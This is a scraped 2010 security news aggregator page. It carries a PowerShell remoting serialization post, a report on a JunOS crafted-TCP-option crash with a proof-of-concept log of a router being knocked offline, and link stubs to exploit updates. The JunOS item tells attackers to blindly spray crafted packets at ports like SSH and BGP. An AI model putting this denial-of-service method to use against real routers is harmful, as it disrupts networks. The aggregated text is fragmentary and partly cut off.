just thought this exploit would be interesting to study since it s a popular program Also, the exploit was coded before, but only in python and ruby, so since this is a perl version, it deserves to be put on here too This is a remote buffer http://www.secuobs.com/revue/news/179414.shtmlhttp://www.secuobs.com/revue/news/179414.shtml 2010-01-07 22:13:28 - Windows PowerShell Blog : Instead of piping unstructured text, Windows PowerShell pipes objects between commands in a pipeline As a consequence PowerShell remoting also deals with objects when passing data to and from remote sessions This post explains how remote objects are serialized and which types of objects can be sent with full fidelity You might want to refer to this post when passing arguments to remote commands or when designing remoting-friendly cmdlets or functions Property bags You might have noticed Deserialized prefix in front of type names of some objects received from a remote session PS C s New-PSSession localhost PS C Invoke-Command s Get-Process Get-Member TypeName DeserializedSystemDiagnosticsProcess Objects that have the Deserialized prefix in their type names are property bags that contain a deserialized representation of public properties of the corresponding remote, live objects As you can see in the output of Get-Member those property bags don't expose any methods except ToString , because usually methods cannot be invoked in the remote session for example, SystemDiagnosticsProcessKill can't act on a remote process Similarly setting and getting property values of the property bags doesn't execute any code for example WorkingSet property of DeserializedSystemDiagnosticsProcessWorkingSet is only a snapshot and doesn't get updated when the remote process uses more memory Serialization settings ie serialization depth are controlled to some extent by the extended type system and typesps1xml files See an older post for more details Primitive types Some objects can be deserialized into a live object An example are some primitive types, like integers PS C s New-PSSession PS C Invoke-Command s 123 Get-Member TypeName SystemInt32 Below is a list of all primitive serialization-wise types Byte, SByte, Byte Int16, Int32, Int64, UInt16, UInt32, UInt64 Decimal, Single, Double TimeSpan, DateTime, ProgressRecord Char, String, XmlDocument, SecureString Boolean, Guid, Uri, Version Almost-primitive types Some types are not deserialized with full fidelity, but nevertheless behave as primitive types for most practical purposes For example Enums are deserialized into an underlying integer with a preserved ToString value The deserialized value is almost indistinguishable from the original enum, because PowerShell can implicitly cast from the integer to the original enum type One can also request an explicit cast scripters can just use the scripting language and NET developers can call into one of LanguagePrimitives methods to perform a cast using those methods will make the cast go through the scripting engine and take account of PSObject wrapping and other casting quirks Similarly, deserializer will preserve contents of lists, but might change the actual type of the container The change of the underlying container type is usually invisible, because there is a built-in cast from any container to an appropriate array Below is a list of recognized and handled container types Lists all types implementing IEnumerable are deserialized into an ArrayList Dictionaries all types implementing IDictionary are deserialized into a Hashtable The bottom line of this section is that non-primitive types can be remoting-friendly as long as they support casting from a primitive value Rehydration PowerShell exposes a mechanism by which third parties can instruct the deserializer to rehydrate additional types into live objects Rehydration is done by casting the deserialized property bag to the type specified in TargetTypeForDeserialization property in the Typesps1xml file Below is an example taken out of pshome typesps1xml, that shows how rehydration is set up for SystemNetIPAddress type DeserializedSystemNetIPAddress PSStandardMembers TargetTypeForDeserialization MicrosoftPowerShellDeserializingTypeConverter The MicrosoftPowerShellDeserializingTypeConverter is a special class that inherits from SystemManagementAutomationPSTypeConverter and provides details of type conversion from DeserializedSystemNetIPAddress to a live IPAddress object The rehydration of IPAddress simply passes a deserialized ToString value to the static IPAddressParse method, but reusing of the type casting mechanism lets other parties provide rehydration that performs arbitrarily complex operations We provide built-in rehydration for some of PowerShell types PSPrimitiveDictionary SwitchParameter PSListModifier PSCredential as well as for some types from base class libraries IPAddress, MailAddress CultureInfo X509Certificate2, X500DistinguishedName DirectorySecurity, FileSecurity, RegistrySecurity Thanks, Lukasz Anforowicz MSFT Windows PowerShell Developer Microsoft Corporation IMAGE http://www.secuobs.com/revue/news/179320.shtmlhttp://www.secuobs.com/revue/news/179320.shtml 2010-01-07 17:34:41 - Positive Technologies Research Lab : Juniper Networks is warning customers of a critical flaw in its gateway routers that allows attackers to crash the devices by sending them small amounts of easily-spoofed traffic - The Register news The JunOS kernel will crash ie core when a specifically crafted TCP option is received on a listening TCP port The packet cannot be filtered with Junos's firewall filter A router receiving this specific TCP packet will crash and reboot Affected Devices JunOS 3x - 10x versions released later then 1 28 2009 Software releases built on or after January 28, 2009 have already fixed the issueSolution Upgrade the OS There are no totally effective workarounds Funny A Juniper spokeswoman said the bulletin was one of seven security advisories the company issued under a policy designed to prevent members of the public at large from getting details of the vulnerabilities Because of Juniper's 'Entitled Disclosure Policy,' only our customers and partners are allowed access to the details of the Security Advisory, the spokeswoman wrote Ooohhh How about this when a specifically crafted TCP option is received on a listening TCP port It's more than enough We have 256 guesses Simple Proof-of-Concept demo hod ping 16925411 PING 16925411 16925411 56 data bytes 64 bytes from 16925411 icmp_seq 0 ttl 254 time 4623 ms 64 bytes from 16925411 icmp_seq 1 ttl 254 time 4531 ms 64 bytes from 16925411 icmp_seq 2 ttl 254 time 4315 ms C hod hod-junos-test 16925411 22 Target IP 16925411, Port 22 Sending TCP-packets with various crafted TCP options TCP options bruteforce progress OK hod ping 16925411 PING 16925411 16925411 56 data bytes Request timeout for icmp_seq 0 Request timeout for icmp_seq 1 Request timeout for icmp_seq 2 C 256 packets and JunOS router is dead and after analyze sniffing traffic we are know true evil TCP packet The JUNOS firewall filter ACL is unable to filter a TCP packet with this issue Successful exploitation requires knowledge of a listening remote TCP port opened or firewall filtered, it doesn't matter at all For example, attackers can send blind a many number crafted packets to well known TCP ports 22 SSH, 179 BGP and other And That's enough http://www.secuobs.com/revue/news/179219.shtmlhttp://www.secuobs.com/revue/news/179219.shtml 2010-01-06 22:46:59 - Exploit DB updates : http://www.secuobs.com/revue/news/178946.shtmlhttp://www.secuobs.com/revue/news/178946.shtml 2010-01-06 20:05:53 - Exploit DB updates : http://www.secuobs.com/revue/news/178884.shtmlhttp://www.secuobs.com/revue/news/178884.shtml 2010-01-06 20:05:53 - Exploit DB updates : http://www.secuobs.com/revue/news/178882.shtmlhttp://www.secuobs.com/revue/news/178882.shtml 2010-01-06 20:05:53 - Exploit DB updates : http://www.secuobs.com/revue/news/178881.shtmlhttp://www.secuobs.com/revue/news/178881.shtml 2010-01-06 02:28:42 - Exploit DB updates : http://www.secuobs.com/revue/news/178612.shtmlhttp://www.secuobs.com/revue/news/178612.shtml 2010-01-05 22:04:35 - Rootsecure.net : Darknet fimap Remote Local File Inclusion RFI LFI Scanner http://www.secuobs.com/revue/news/178499.shtmlhttp://www.secuobs.com/revue/news/178499.shtml 2010-01-05 18:35:56 - Security International : Merlin Eco uses the main power wiring to switch remote devices http://www.secuobs.com/revue/news/178418.shtmlhttp://www.secuobs.com/revue/news/178418.shtml 2010-01-05 11:19:27 - Darknet The Darkside : http://www.secuobs.com/revue/news/178277.shtmlhttp://www.secuobs.com/revue/news/178277.shtml 2010-01-04 23:30:25 - Exploit DB updates : http://www.secuobs.com/revue/news/178086.shtmlhttp://www.secuobs.com/revue/news/178086.shtml 2010-01-04 19:42:29 - Exploit DB updates : http://www.secuobs.com/revue/news/177981.shtmlhttp://www.secuobs.com/revue/news/177981.shtml 2010-01-03 21:50:19 - Exploit DB updates : http://www.secuobs.com/revue/news/177686.shtmlhttp://www.secuobs.com/revue/news/177686.shtml